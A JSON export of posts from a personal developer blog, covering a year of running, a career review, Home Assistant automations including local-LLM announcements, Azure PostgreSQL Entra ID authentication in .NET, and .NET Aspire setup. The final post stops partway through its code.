[ { "title": "1503km", "url": "https://www.aaron-powell.com/posts/2025-01-13-1503km/", "date": "Mon, 13 Jan 2025 02:21:15 +0000", "tags": [ "running" ], "description": "The story of my 2024 running journey.", "content": "With 2024 coming to a close I managed to just scrape through with my yearly goal of 1500km, having to go out on NYE for one last run (I had 7km to go, so I ran 10km just to be safe).\nCompared to 2023 where I managed to hit my 1500km goal in November, hitting it on the last day of the year was… different.\nThe raw stats Again, looking at my Strava profile, here’s the breakdown of what was 2024:\nTotal distance: 1503.3km Total time: 129 hours, 12 minutes (or 5 days, 9 hours, 12 minutes) Total activities: 208 Elevation gain: 10,163m My biggest month was November at 166km, followed by August at 162km. I’m not surprised by November being the biggest month, I went pretty hard there when I realised I might make it to 1500km, if I really stepped up the distance (nothing like a bit of pressure to get you moving).\nI also had a bunch of gym sessions and some paddle boarding in there, but Strava is pretty terrible at giving a full aggregation view (outside of their “year in sport” which you can’t retrieve after the year ends), so that’s just the pure running stats.\nLooking at the data vs the past few years, it’s a pretty similar amount of time spent running, 2023 was 133 hours and 2022 was 129 hours so it seems that year on year I spend about the same amount of time running, I just use that time differently.\nGoals So what changed from 2023 to 2024? Well, I’d say that it was ultimately my goal around what I wanted out of running. For the past few years I’d been pushing harder and harder to get faster and faster, but in 2024 I decided I wanted to focus on the basics and just get out there and run.\nMy wife also signed up for her first marathon (she also said it would be her only one, but she’s signed up again this year!), so I wanted to support her training, leaving the bulk of available running time to her.\nWe also spent a month overseas on holidays, which naturally resulted in a drop in running time. I did manage to get another Parkrun tourist in, running Highbury Fields in London and clocking a 19.30 (first sub-20 outside of Australia). I also went for a run around Tuscany which was some amazing scenery (and one particularly brutal hill). I capped off the trip running around Rome and getting selfies at all the major landmarks.\nTraining and races I did do two races this year, City2Surf and the 10km at the Sydney Marathon (while my wife ran the full). Since I wasn’t really that focused on races though, I didn’t really do any specific training for most of the year - sure as the events got closer I was a bit more structured, following the approach I’d used over the past few years (you can read them in last years post, I won’t rehash here).\nOne thing I decided to do this year for the first time was to gauge my fitness each quarter with a 3km time trial. For this, I picked a dead flat 3k loop around a nearby oval (although I had to move for Q3 and Q4 as the park/path was flooded), went out in the same shoes each time for consistency, and ran it as hard as I could. Here’s the time using the Elapsed Time from Strava:\nQ1*: 11:26 Q2: 10:50 Q3: 10:30 Q4: 10:19 Q1 is a bit of an outlier as the moving time is like 10:08, but that’s because I went out waaaaaaaaay too hard and had to pause about half way to ensure the water I’d had stayed down, so while on paper the splits look strong, it’s not an accurate reflection of the outcome.\nI’m pretty happy with the progression over the course of the year, and I think it’s an accurate reflection of how the year panned out. I’m not surprised that the last one was the fastest as it was on the back of the two races I did, so the training level was at its peak. I plan to continue this into 2025, and I’ll be interested to see what the Q1 time is this time, given the increased load I saw through the end of 2024, even though it wasn’t focused on speed work.\nCity2Surf was a pretty standard affair for me this year with a 58:29, about a minute behind my PB from 2023. I was expecting this, the event was the busiest I’d run in and given the rather average training I’d put in, being able to pull out a solid sub-60 was a good result.\nSydney Marathon 10km Yeah, pretty solid effort there! My goal was to run a sub-40, as I’d never run sub-40 in a 10k event before (I also hadn’t run a 10k event in a very long time, but that’s beside the point!), I’m more happy that I was in the top 100 finishers, which I think is a pretty solid achievement.\nBecause I had a goal I went into the race with a plan - run fast 🤣. Jokes aside, that was really pretty much the game plan. If you look at the Strava activity, it’s clear that it’s a net-downhill course, with a lot of front-loaded downhill, in it was over 50m down in the first 5k, meaning that you can push harder for the same effort. On the day, this got coupled with a hectic amount of wind, which was a bit of a tailwind coming down from North Sydney and over the bridge.\nI started a bit back in the pack, and managed to catch the 40 minute bus at the 5k mark, as we were headed into the flat area. This gave me a good indicator on where I was tracing and what I’d need to push for the back half of the course. I was able to push really hard through the 7th km, which was helped by a massive tailwind (actually copped a blast at one point that nearly caused me to trip, I did clip my foot on my other leg in a stride) but I knew I’d need this as the 8/9 km point was a rough climb, which got made even harder with the wind whipping down the street at us. I heard the pacers behind me, and I knew I had to push hard to keep in front of them (and I was thankful I’d banked some time), and then I could push again on the final bit of downhill to the finish.\nAfter the race was done I picked up my gear bag and went to find my wife on course, where I ran with her for a bunch. I ended up doing an extra 15k post my race… so maybe I could have pushed harder 😁.\nWrapping up So that’s 2024 in running for me. I’m pretty happy with how the year went, I didn’t have any injuries or major setbacks, I hit my goal, and I got back to the basics of “just running”. I’m not sure what 2025 is going to look like yet, I’m eying an event in April and I’ll do City2Surf again, mostly because I enjoy it, but I’m not sure what else I’ll do (probably the 10k at the Sydney Marathon again, assuming it comes back).\nI’m also going to keep up the quarterly time trials, I think they’re a good way to gauge fitness and see how I’m progressing, and I’m going to keep up the focus on just getting out there and running.\n", "id": "2025-01-13-1503km" }, { "title": "2024 a Year in Review", "url": "https://www.aaron-powell.com/posts/2025-01-09-2024-a-year-in-review/", "date": "Thu, 09 Jan 2025 05:25:21 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Would you look at that, I’m even early this year compared to my 2023 post which was earlier than 2022! I’m on a roll!\nIt’s funny sitting down to write this post because, honestly, I haven’t really done much writing in the past year. In fact, if we exclude the “in review” posts I did, one about 2023 and the other about running (so… nothing to do with tech), I wrote a grand total of 5 blog posts in 2024 (and two of them were about my smart home), which is the first time ever I’ve done only a single digit number of posts in a year.\nNow these numbers aren’t entirely accurate of my blogging, I published 4 blogs on the .NET blog so technically I wrote 9 posts, but I don’t really count those as they’re not on my personal blog.\nI’m not entirely sure as to why that is though. After all, it’s not like I didn’t do any work in 2024, I guess I just didn’t feel like I had much to say, at least not in this medium or I’m just lazy 😜.\nWork For the first half of 2024 I was still heavily involved in the .NET and AI story, but when Microsoft Build came around in May I handed over the AI aspect and took lead of the .NET Aspire strategy in our team. This is a much better fit for me, after all, the first two blogs I did last year were on Aspire and we’ve got other members in our team with an AI background that can take the lead on that.\nAspire has been great to work on, and it’s been very interesting getting more involved with a product team and seeing how they work. I’ve contributed a few bits of code to the project, done some docs work (one such bit was expanding how to write tests with Aspire which is honestly one of the best features), but the work I’m most proud of, and excited for the future of, is the .NET Aspire Community Toolkit.\nI pitched the idea of the Community Toolkit (or “Aspire Contrib” as it was originally pitched) back in June and we finally announced it in November. It really has exploded since then and I’m super excited for the community that we’re building around Aspire. From something that started with only like 2 integrations, we’re almost at 20 with 5 more in PR review (and a bunch more proposed). If you’re building with Aspire, check out what we’ve got to help you build a wider variety of apps. Check out this session from .NET Conf for more on the toolkit and how to build a custom integration.\nSpeaking I actually got back into speaking at events even more in 2024, I spoke at nearly 10 in person events (including getting to go to Japan to speak!), and a few online ones as well. And 2025 is shaping up to be just as busy, with 2 events already confirmed for the first half of the year.\nProbably the highlight I had was AI Tour Sydney in December, where I got to present about GitHub Copilot and Visual Studio in a 7000 seat arena (look, there might have only been a few hundred in there, but the arena can hold 7000 😜). It’s an arena that Elton John has performed on, so I’ve technically performed on the same stage as him #humblebrag.\nIf you squint you can see me on stage 😜.\nMy other speaking highlight was being back at DDD Melbourne (I’m 11 for 12 of their events!) and I got to present about a personal topic, my journey through burnout. It was a very personal talk, and I was very nervous about it, but the response I got was very heartwarming and I’m very grateful for the support I received. I also got to reprise it for DDD Brisbane, and I’m glad I can do my part to remove the stigma around mental health.\nAnd with that, let’s bring on 2025.\n", "id": "2025-01-09-2024-a-year-in-review" }, { "title": "Building a Smart Home - Part 16 Seasonal Automation's", "url": "https://www.aaron-powell.com/posts/2024-09-01-building-a-smart-home---part-16-seasonal-automations/", "date": "Sun, 01 Sep 2024 04:03:16 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Spring has sprung here in Australia and it's time for the house to adapt", "content": "In the 2024.4 release of Home Assistant, the Labels feature was introduced. This feature allows you to add labels to entities, areas, and automations. This is a great feature for organisation as you can apply as many as you want and then perform actions based on those labels.\nPreviously, I’d tackled this style of organisation (and the organisation that Categories introduced) by putting keywords into the names of my automations, and while this worked, it wasn’t as clean as I would have liked.\nOne of the things I setup with this is adding season labels, Spring, Summer, Autumn, and Winter, and putting them on automations that are only relevant for that season. While this helps with the visual organisation, there’s also the benefit of automating automations based on the season. For example, we have motorised blinds in our house, and in summer, if the temperature of the room exceeds the desired threshold, we’ll automatically close them, but in winter, we’ll leave them open as a) it’s unlikely they’ll exceed the threshold and b) we want the sun to help heat the room.\nAutomating Based on Season Firstly, we need to know what season it is, and we can do that using the Seasons integration. This integration will create a sensor that will tell you what season it is based on the date. With the integration setup, we can access sensor.season and trigger automations based on value change.\n1 2 3 4 5 6 7 8 alias: Toggle seasonal automations description: "" trigger: - platform: state entity_id: - sensor.season condition: [] action: [] I’m going to use the choose action to determine what season it is and then trigger the relevant steps:\n1 2 3 4 5 6 7 action: - choose: - conditions: - condition: state entity_id: sensor.season state: winter sequence: [] In the sequence block, we’re going to run automation.turn_off and automation.turn_on actions to turn on and off the relevant automations.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 action: - choose: - conditions: - condition: state entity_id: sensor.season state: winter sequence: - metadata: {} data: stop_actions: true target: label_id: - summer - spring - autumn action: automation.turn_off - metadata: {} data: {} target: label_id: winter action: automation.turn_on Notice that we pass in the label_id of the labels we want to turn off and on. This is a list, so you can pass in as many as you want, and it means that we can have automations that are relevant for multiple seasons.\nRepeat this for all four seasons then with our automations labeled appropriately, we can have the house adapt to the season automatically.\nConclusion This is a crazy simply solution to something that I was previously doing manually, either by having a whole heap of conditions within automations to handle the concept of seasonality, or by manually turning on and off automations (which of course I’d forget to do). This is a great example of how a simple feature can have a big impact on the usability of Home Assistant.\nThe automation.turn_off and automation.turn_on actions with labels as the target is a powerful feature that I use for other use-cases, such as disabling certain automations overnight (mostly motion sensors) or toggling automations for when we have house sitters (which you can read more about in Part 11 of this series).\nIf you haven’t tried Labels yet, I highly recommend you do, as it’s a great way to organise your Home Assistant setup, and a nifty way to automate your automations.\n", "id": "2024-09-01-building-a-smart-home---part-16-seasonal-automations" }, { "title": "Building a Smart Home - Part 15 Generative AI and Notifications", "url": "https://www.aaron-powell.com/posts/2024-08-13-building-a-smart-home---part-15-genai-and-notifications/", "date": "Tue, 13 Aug 2024 06:01:47 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Let's have some fun with Generative AI", "content": "Like many people, I’ve been diving into Generative AI (GenAI) over the past 12 or so months and looking at how to use it in the sorts of solutions we can build. I’m also the kind of tinkerer that is looking for how to use technology in weird and wonderful ways. So, I’ve been looking at how to use GenAI in my smart home.\nBefore we get into that part of the story, a little bit of context around something I was doing recently. For the better part of a year I’ve had a daily notification that runs for our kids which tells them what they have on that day at school, whether it’s their library day, they have sport, after school care, etc. This runs at 8.30am, which is just before we leave the house and, well, it’s been a bit of a “Pavlov’s bell” for them. They hear the notification and they know what’s coming up that day and that it’s time to be ready to leave.\nThe thing is, this message is pretty static, I run a template that looks at a bunch of helpers setup in Home Assistant and then generates a message. It’s a bit boring because it’s very static, like “ here are your school reminders. It’s sports day, don’t forget your sports shoes. You have after school care today.” It’s the same generalised message, just plugging a few different variables in, so it solves the problem but it’s not very interesting.\nEnter GenAI After upgrading the hardware my Home Assistant instance runs on (from a Pi4 to a NUC), I have a bit more power to play with, so I had been running some Small Language Models (SLMs) on the NUC to see what I could do with them. The NUC itself is too underpowered to be used as a local GenAI server to back the Assistants part of Home Assistant (I tried, Phi3-mini doesn’t have a large enough token cap for the system message, let alone a user message, and anything larger takes so long to response that it’s completely impractical 🤣), but if it’s running a SLM that is only serving responses on occasions, well that should be fine.\nHello Ollama The first thing we need to do is have a way in which we can run the SLM and get a response. I’m going to be using Ollama, as it’s a nifty little tool for working with models like this, and it can be run either as a standalone executable, or as a Docker container. Follow their guide on how to get it running on whatever host you have (I’m using Docker on my NUC).\nNext, we’ll need to pick a model to use. Because I’m running this on a NUC, I don’t really have a GPU to play with, so I’ve decided to go with a pretty small model, Phi3 using the mini variant of it, which is only about 2gb of disk size and has 3.82B parameters. It’s not really that big, but given we’re going to be CPU-bound for this, we’ll have to make some tradeoffs (let’s just say, I won’t be running llama3.1:405b anytime soon 😅).\nWith everything setup, I can hit ollama with a request:\n1 curl -X POST -H "Content-Type: application/json" -d '{"prompt": "What should I tell the kids today?", "model": "phi3", "stream": false}' http://ollama.local:11434/api/generate Note: We set stream: false in the JSON payload to ensure we get the whole completion as a single response rather than a stream of responses. This is important because a streamed response isn’t really useful in this context.\nAnd get back a response (this one took just over a minute to generate):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 { "model": "phi3", "created_at": "2024-08-13T06:45:23.253914122Z", "response": " As an AI, I can help you come up with a variety of ideas for what to share with children. Here are some suggestions based on different themes:\\n\\n\\n1. **Science**: Share interesting facts about space exploration or explain how plants grow using simple experiments they can try at home.\\n\\n2. **History/Social Studies**: Discuss the importance of a historical figure like Martin Luther King Jr., and explore his contributions to civil rights in an age-appropriate manner.\\n\\n3. **Literature**: Read a story or fable from Aesop, highlighting moral lessons within them. Encourage children to share their interpretations afterward.\\n\\n4. **Arts/Crafts**: Have the kids engage in an art project using recycled materials to teach creativity and environmental responsibility.\\n\\n5. **Daily Life Lesson**: Explain a simple concept like sharing or being kind, perhaps through interactive role-playing activities.\\n\\n6. **Physical Activity/Health**: Teach the kids about staying active and healthy with fun exercises they can do together or games that encourage movement.\\n\\n\\nRemember to adjust the complexity of your message based on the age group you're addressing, ensuring it's engaging and understandable for them.", "done": true, "done_reason": "stop", "context": [ 32010, 1724, 881, 306, 2649, 278, 413, 4841, 9826, 29973, 32007, 32001, 1094, 385, 319, 29902, 29892, 306, 508, 1371, 366, 2041, 701, 411, 263, 12875, 310, 7014, 363, 825, 304, 6232, 411, 4344, 29889, 2266, 526, 777, 10529, 2729, 373, 1422, 963, 267, 29901, 13, 13, 13, 29896, 29889, 3579, 29903, 15277, 1068, 29901, 26849, 8031, 17099, 1048, 2913, 3902, 12418, 470, 5649, 920, 18577, 6548, 773, 2560, 15729, 896, 508, 1018, 472, 3271, 29889, 13, 13, 29906, 29889, 3579, 20570, 29914, 6295, 1455, 16972, 1068, 29901, 8565, 1558, 278, 13500, 310, 263, 15839, 4377, 763, 6502, 24760, 4088, 13843, 1696, 322, 26987, 670, 20706, 304, 7631, 10462, 297, 385, 5046, 29899, 932, 6649, 403, 8214, 29889, 13, 13, 29941, 29889, 3579, 24938, 1535, 1068, 29901, 7523, 263, 5828, 470, 285, 519, 515, 319, 267, 459, 29892, 12141, 292, 14731, 3109, 787, 2629, 963, 29889, 11346, 283, 6617, 4344, 304, 6232, 1009, 6613, 800, 1156, 1328, 29889, 13, 13, 29946, 29889, 3579, 1433, 1372, 29914, 29907, 4154, 29879, 1068, 29901, 6975, 278, 413, 4841, 3033, 482, 297, 385, 1616, 2060, 773, 1162, 11078, 839, 17279, 304, 6860, 907, 28157, 322, 29380, 23134, 29889, 13, 13, 29945, 29889, 3579, 29928, 8683, 4634, 27898, 265, 1068, 29901, 12027, 7420, 263, 2560, 6964, 763, 19383, 470, 1641, 2924, 29892, 6060, 1549, 28923, 6297, 29899, 1456, 292, 14188, 29889, 13, 13, 29953, 29889, 3579, 25847, 936, 13414, 29914, 3868, 4298, 1068, 29901, 1920, 496, 278, 413, 4841, 1048, 7952, 292, 6136, 322, 9045, 29891, 411, 2090, 24472, 3476, 267, 896, 508, 437, 4208, 470, 8090, 393, 13731, 6617, 10298, 29889, 13, 13, 13, 7301, 1096, 304, 10365, 278, 13644, 310, 596, 2643, 2729, 373, 278, 5046, 2318, 366, 29915, 276, 3211, 292, 29892, 5662, 3864, 372, 29915, 29879, 3033, 6751, 322, 2274, 519, 363, 963, 29889, 32007 ], "total_duration": 76865873877, "load_duration": 1001112, "prompt_eval_duration": 266416000, "eval_count": 292, "eval_duration": 76556834000 } Great, now let’s plug this into Home Assistant.\nHome Assistant Integration Home Assistant has an Ollama integration, but it’s not quite what I want. This is if you want to plug Ollama (or any other GenAI service) into Home Assistant as an Assistant, so you can ask it questions and get responses. I want to use it as a notification, so I can generate a message and send it to the kids (or really, any broadcast notification), which means I’m going to be using a RESTful Command to call the Ollama API. Here’s the configuration for that:\n1 2 3 4 5 6 7 ollama_phi3_completion: method: POST url: http://ollama.local:11434/api/generate content_type: "application/json; charset=utf-8" payload: "{{ payload }}" verify_ssl: false timeout: 300 Reload the RESTful Command config and then there will be a new entity in Home Assistant, rest_command.ollama_phi3_completion, which we can call from anywhere that allows us to call an action. To test it out, navigate to the Developer Tools -> Actions page in Home Assistant, select rest_command.ollama_completion from the dropdown, and then enter the following into the Service Data field:\n1 2 3 4 5 6 7 8 action: rest_command.ollama_phi3_completion data: payload: | { "prompt": "What should I tell the kids today?", "model": "phi3", "stream": false } And we can see a result:\nAwesome, time to plug it into an automation.\nAutomation I already have an automation that runs to generate the message that we then broadcast on the speakers around the house using a TTS (text-to-speech) service. I’m going to modify this automation to call the Ollama RESTful Command before calling the TTS service. But there’s a catch, the Ollama API can take a while to respond, from testing it can take a few minutes with a “real” payload size, so to keep the 8.30am notification on time, I’m going to run the Ollama API call at 5.30am and “cache” the response up until it’s needed.\nUnfortunately, while Home Assistant has a input_text helper that we can use, it has a max length of 255 characters, which is not enough for the response we’re going to get back from Ollama, so instead, we’ll just have the automation wait around for 8.30am.\nHere’s the automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 - alias: Kids school announcements (AI) description: "" trigger: - platform: time at: 05:30:00 condition: - condition: state entity_id: binary_sensor.school_is_school_day state: "on" action: - metadata: {} data: payload: "<snip>" response_variable: kid1_completion action: rest_command.ollama_phi3_completion alias: Generate kid1's announcement - metadata: {} data: payload: "<snip>" response_variable: kid2_completion action: rest_command.ollama_phi3_completion alias: Generate kid2's announcement - wait_for_trigger: - platform: time at: 08:30:00 - if: - condition: template value_template: "{{ kid1_completion['status'] == 200 }}" then: action: tts.cloud_say data: cache: false entity_id: media_player.whole_house message: "{{ kid1_completion['content']['response'] }}" alias: Broadcast kid1 announcement - wait_for_trigger: - platform: state entity_id: - media_player.whole_house from: playing to: idle timeout: hours: 0 minutes: 2 seconds: 0 milliseconds: 0 - if: - condition: template value_template: "{{ kid2_completion['status'] == 200 }}" then: action: tts.cloud_say data: cache: false entity_id: media_player.whole_house message: "{{ kid2_completion['content']['response'] }}" alias: Broadcast kid2 Announcement mode: single I’ve removed the actual payload from the automation, but you can see that we’re calling the Ollama API at 5.30am, storing the response in a response variable, then using the wait_for_trigger action to wait until 8.30am before broadcasting the message. If the Ollama API call fails, we just skip that child’s announcement. We also wait for the TTS service to finish before moving onto the next child’s announcement.\nExample Run Today, one of my kids didn’t have any “special” activities at school, so the message that was sent to the SLM was:\nCreate a friendly response that will announced over our house speakers in the morning to inform a child of their activities that they have today. Keep it short, it should be announced in the space of about 1 minute. The child's name is '<child>', and the following is a description of what their day involves. ## Description There are no special activities at school today. And the response back from Ollama was:\nGood morning <child>! It's time to get ready for another exciting day ahead. School starts just like any other day with learning, playing, and making new memories. Remember, even without special activities, every day brings opportunities to discover something amazing. Have a fantastic day at school, buddy! Conclusion This was a fun little project to work on, and it’s a great example of how you can use GenAI in your smart home to make things a little more interesting.\nI’ve had this running for a few days now (it was running in the background to test generation for a bit before I did the TTS and deprecated the original one) and the first time it ran I heard a call from my kids of “Dad, the house said something different today!” which is either a good sign, or a sign that Pavlov’s bell has been replaced with a new one 🤣.\nThere’s still a few tweaks I need to do in the context around the message, for example, it will sometimes return emojis which the TTS service then reads out (we had “sparkle smiley face” the other day), but that’s all part of the fun of working with GenAI.\nIt was also funny when we had school sport, as we use an acronym to refer to it, but that acronym the model doesn’t know about, so it made something up for it with… less that helpful results!\nMy next plan is to plug this into the automations that announce when our various appliances have finished the cycles (see Part 3 of this series on how I did that), so that we can get something better than “The washing machine has finished” 🤣.\n", "id": "2024-08-13-building-a-smart-home---part-15-genai-and-notifications" }, { "title": "Azure PostgreSQL, Entra ID Authentication and .NET", "url": "https://www.aaron-powell.com/posts/2024-06-03-azure-postgresql-and-entra-id-dotnet/", "date": "Mon, 03 Jun 2024 00:08:47 +0000", "tags": [ "dotnet", "security", "azure" ], "description": "A look at how to connect to an Azure PostgreSQL Flexible Server using Entra ID rather than username/password using Npgsql", "content": "I’m currently working on a project in which we are using Entra ID rather than a traditional Postgre username and password. This is a great way to secure your database and ensure that only the right people have access to it.\nNote: For the purpose of this article, I’m going to use Entra ID to refer to a user identity, as well as a managed identity such as a service principal, as the approach is the same in this context here.\nThe above linked documentation covers how you would setup the Azure resource with Entra ID as the authentication mode, so I won’t go over that here (also, you can configure that when you initial create the database, or using a Bicep script), instead I want to look at how we use that in a .NET application, because when you’re connecting using Entra ID you don’t have a password to use, or at least not in the traditional sense.\nFor this, I’m going to use the Npgql library, which is the most popular PostgreSQL driver for .NET. It’s a great library and has a lot of features, and integrates nicely with Entity Framework Core and .NET Aspire.\nWhat makes connecting different Before we look at the how of connecting, we need to understand why this is a little different to using a username/password approach. When working with a PostgreSQL database that uses a username/password, you would have a connection string that looks like this:\nServer=myServerAddress;Port=5432;Database=myDataBase;User Id=myUsername;Password=myPassword; But when connecting using Entra ID, it looks like this:\nServer=server-name.postgres.database.azure.com;Database=postgres;Port=5432;Username=<Entra ID>;Ssl Mode=Require; Notice how there is no Password field in the connection string. This is because when you connect using Entra ID, you don’t have a password to use. Instead, you need to use a token that is generated by Entra.\nGenerating a token When you connect to the database using Entra ID, you need to request an access token from Entra that you can use to authenticate. You can see this in action using the Azure CLI:\n1 az account get-access-token --resource-type oss-rdbms Which returns something like this:\n1 2 3 4 5 6 7 8 { "accessToken": "<nope!>", "expiresOn": "2024-05-31 17:52:59.000000", "expires_on": 1717141979, "subscription": "<nope!>", "tenant": "<nope!>", "tokenType": "Bearer" } If you extract the accessToken from the JSON you can then plug that into the connection string for PostgreSQL in the Password argument and you’re good to go.\nBut it’s not really practical to be running the Azure CLI every time you want to connect to the database, especially since this token is only short lived (you can see the expiry date in the JSON above). Instead, we’re going to want to do this in .NET, and for that we’ll use the Azure.Identity NuGet package.\nUsing Azure.Identity Azure.Identity is a library that provides a way to authenticate with Azure services using the Azure SDK, and it contains a class called DefaultAzureCredential that can be used to authenticate. This class is actually a roll-up of a number of different authentication sources, such as Managed Identity, as well as the Azure CLI, Visual Studio, and a bunch of other sources (check out the docs to see all the sources).\nTo use DefaultAzureCredential you need to install the Azure.Identity NuGet package:\n1 dotnet add package Azure.Identity Then you can use it in your code like this:\n1 2 3 4 5 6 using Azure.Identity; var credential = new DefaultAzureCredential(); var ctx = new TokenRequestContext(["https://ossrdbms-aad.database.windows.net/.default"]); var tokenResponse = await credential.GetTokenAsync(ctx); Console.WriteLine(tokenResponse.Token); The important part here is that we’re providing a specific scope to the TokenRequestContext of https://ossrdbms-aad.database.windows.net/.default, which grants access to the Azure PostgreSQL Flexible Server. It’s what is being done with the az account get-access-token call and the --resource-type oss-rdbms argument. With this in C# though, we’re able to get the token and then use that to connect to the database.\nHandling Token Expiry One thing to note is that the token that is returned by DefaultAzureCredential is short lived, and will expire after a certain amount of time (24 hours service principal, 4 hours for a user token). This is fine for, say, a console app that is only running for a short period of time, but this becomes a problem if you’re using the connection string in something that is long running, like a web app, since the NpgsqlDataSourceBuilder, the type that is used to build the connection string, should be a singleton.\nThankfully, the authors of Npgsql have given us an approach to handling token refreshes in the box using a Periodic Password Provider. With this feature, we can provide a callback function to be run that will retrieve the password when a connection is opened, and then cache that password for a certain amount of time. This means that we can use the DefaultAzureCredential to get the token, and then use that token to connect to the database.\n1 2 3 4 5 6 7 8 9 NpgsqlDataSourceBuilder dataSourceBuilder = new(builder.Configuration.GetConnectionString("Database")); dataSourceBuilder.UsePeriodicPasswordProvider(async (_, ct) => { DefaultAzureCredential credential = new(); TokenRequestContext ctx = new(["https://ossrdbms-aad.database.windows.net/.default"]); AccessToken tokenResponse = await credential.GetTokenAsync(ctx, ct); return tokenResponse.Token; }, TimeSpan.FromHours(4), TimeSpan.FromSeconds(10)); On the dataSourceBuilder we call the UsePeriodicPasswordProvider method, passing in a callback function that will get the token, and then two TimeSpan objects that represent the refresh period and the failure refresh period. The refresh period is how often the token will be refreshed, and the failure refresh period is how long to wait before trying to refresh the token again if the token retrieval fails.\nConnecting it all up Now that we know how we can retrieve a token to act as the password for our connections, let’s look at how to connect it all up for a local dev or Azure deployed app:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 WebApplicationBuilder builder = WebApplication.CreateBuilder(args); var connStr = builder.Configuration.GetConnectionString("db"); NpgsqlConnectionStringBuilder csb = new(connStr); if (!string.IsNullOrEmpty(csb.Password)) { builder.AddNpgsqlDataSource("db"); } else { builder.AddNpgsqlDataSource("db", dataSourceBuilder => { dataSourceBuilder.UsePeriodicPasswordProvider(async (_, ct) => { DefaultAzureCredential credential = new(); TokenRequestContext ctx = new(["https://ossrdbms-aad.database.windows.net/.default"]); AccessToken tokenResponse = await credential.GetTokenAsync(ctx, ct); return tokenResponse.Token; }, TimeSpan.FromHours(4), TimeSpan.FromSeconds(10)); }); } // and the rest of your app code Here we’re getting the connection string and creating a NpgsqlConnectionStringBuilder from it so that it gets parsed for us. If the connection string we have has a password, then we can just use that as normal, but if it doesn’t have a password, then we can use the UsePeriodicPasswordProvider method to get the token and use that as the password.\nThis means we can run locally against a database that uses username/password style access (since we don’t have Entra ID locally), and then deploy to Azure and use Entra ID without having to change the code.\nConclusion When porting an app that uses PostgreSQL to using Managed Identity I was expecting that it would be quite a lot of work to manage the token retrieval and expiry, initially I thought that it’d require doing a bunch of work to discard the singleton for the NpgsqlDataSourceBuilder and then recreate it when the token expired. But thanks to the UsePeriodicPasswordProvider method, it’s actually quite easy to manage the token retrieval and expiry, and it’s all handled for you.\n", "id": "2024-06-03-azure-postgresql-and-entra-id-dotnet" }, { "title": "Exploring OpenAI With Aspire Preview 3", "url": "https://www.aaron-powell.com/posts/2024-02-22-exploring-openai-with-aspire-preview-3/", "date": "Thu, 22 Feb 2024 02:04:24 +0000", "tags": [ "dotnet", "ai" ], "description": "With Aspire Preview 3 there is a new service connector for OpenAI, let's check it out.", "content": "I’ve been exploring .NET Aspire as a pattern for how to build .NET apps, and when checking the features of the Preview 3 release I noticed something interesting, a new service connector for using OpenAI/Azure OpenAI. We knew this was coming, I was following the PR for it, and given I’ve been doing a lot of AI stuff it made sense to try it out.\nBefore we can use the service connector we need to setup the resource in the AppHost:\n1 2 3 4 5 var builder = DistributedApplication.CreateBuilder(args); var openAI = builder.AddAzureOpenAI("AzureOpenAI"); builder.AddProject<MyApp>("app").WithResource(openAI); builder.Build().Run(); In this case we’re using the new AddAzureOpenAI resource builder method to create the resource definition, but if you don’t want to use Azure you can use AddOpenAI instead. Next, the resource needs to be named, in this case I went to AzureOpenAI. This name is important because it’s used to get the endpoint and key from config. Currently, this uses the ConnectionStrings feature of the .NET config system, so I’ve added a section to my appsettings.Development.json like this:\n1 2 3 "ConnectionStrings": { "AzureOpenAI": "Endpoint=https://<my-endpoint>.openai.azure.com/;Key=<my-api-key>" } Admittedly, this setup isn’t ideal as the concept of a connection string doesn’t really map to how the OpenAI SDK works, but that’s being discussed by the team. Also, if you’re using managed identity to connect you don’t need the Key component of it.\nIt’s also possible to define model deployments:\n1 openAI.AddDeployment("gpt-35-turbo"); So far, this doesn’t seem to be used but it’s laying the groundwork for the future where it’ll be possible to deploy Azure OpenAI resources, which is currently not possible.\nAnyway, we have the resource defined and added to our app, now we can use the service connector in the MyApp project:\n1 2 3 4 5 var builder = WebApplication.CreateBuilder(); builder.AddAzureOpenAI("AzureOpenAI"); // Finish configuring the app Like with all Aspire resources, for the service connector we provide the same name that the resource was built as, AzureOpenAI in this case, and with the AddAzureOpenAI inject an instance of the OpenAIClient (from the Azure.AI.OpenAI SDK, which is the same regardless of if you’re doing OpenAI or Azure OpenAI).\nAnd with that all setup, we can inject the OpenAIClient instance into anything we need to use it, such as in an API handler:\n1 2 3 api.MapGet("chat", (OpenAIClient client) => { // Do AI stuff }); Wrapping up While it might seem like it’s pretty trivial to setup the OpenAIClient to be injected in an application, I really like the direction that Aspire is taking with the service connectors. The fact that we can define the resource and inject it into the applications, allowing the resource to be shared across a set of services in your app makes it very convenient.\nI’m not a fan of the “connection string” model for providing the credentials, so I’m following along with what the discussion is going to land on.\nAlso, while deployment isn’t supported in Preview 3, I don’t doubt that that is coming along for a future release, so I’m keen to play with that when it lands.\nUntil then, let’s keep building!\n", "id": "2024-02-22-exploring-openai-with-aspire-preview-3" }, { "title": "Persisting Data Volumes With .NET Aspire", "url": "https://www.aaron-powell.com/posts/2024-01-23-persisting-data-volumes-with-dotnet-aspire/", "date": "Tue, 23 Jan 2024 02:31:26 +0000", "tags": [ "dotnet" ], "description": "Tired of losing all the data when you restart your .NET Aspire app? Let's fix that!", "content": "This post is written against the .NET Aspire Preview 2 release, so it may change when the final version is released.\nRecently, I’ve been building an app using .NET Aspire which I’m using PostgreSQL as the database and Azure Storage Blobs and Queues in.\n.NET Aspire is awesome for this, as you can setup a developer inner loop super simply with the components that ship, and the nice thing about this is that locally PostgreSQL is run in a Docker container and Azure Storage uses the Azurite storage emulator (which also happens to run in a container).\nThe problem with this is that when you restart your app, you lose all the data in the database and storage emulator, since they are started fresh each time.\nTurns out, it’s a pretty easy fix - all that you need to do is mount a volume into the container where it would store it’s data.\nHere’s the PostgreSQL example:\n1 2 3 4 5 6 7 8 IResourceBuilder<PostgresContainerResource> postgresContainerDefinition = builder.AddPostgresContainer(); if (builder.Environment.IsDevelopment()) { postgresContainerDefinition // Mount the 